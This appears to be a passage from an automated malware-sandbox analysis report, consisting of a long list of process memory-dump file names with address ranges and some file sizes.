                                                                                                        • memory/4380-254-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4400-314-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4472-358-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4744-292-0x00000001401FBC30-mapping.dmp
                                                                                                        • memory/4744-291-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.5MB

                                                                                                        • memory/4780-247-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4792-363-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4848-294-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4908-295-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                          Filesize

                                                                                                          284KB

                                                                                                        • memory/4908-296-0x0000000000401480-mapping.dmp
                                                                                                        • memory/4924-241-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4956-317-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4968-365-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5088-250-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5104-251-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5104-311-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5112-242-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5112-246-0x00000000004D0000-0x000000000057E000-memory.dmp
                                                                                                          Filesize

                                                                                                          696KB

                                                                                                        • memory/5112-245-0x00000000004B0000-0x00000000004C0000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/5140-318-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5140-356-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5176-362-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5188-343-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5232-369-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5272-352-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5284-321-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5352-359-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5456-322-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5464-351-0x0000000000402F68-mapping.dmp
                                                                                                        • memory/5508-355-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5644-333-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5656-334-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5756-366-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5860-335-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5884-336-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5892-368-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5928-354-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5948-337-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5996-364-0x0000000000000000-mapping.dmp
                                                                                                        • memory/6068-340-0x0000000000000000-mapping.dmp
                                                                                                        • memory/6136-342-0x0000000000000000-mapping.dmp
                                                                                                        • memory/6136-348-0x0000000005130000-0x0000000005131000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/6136-349-0x0000000007A50000-0x0000000007A51000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB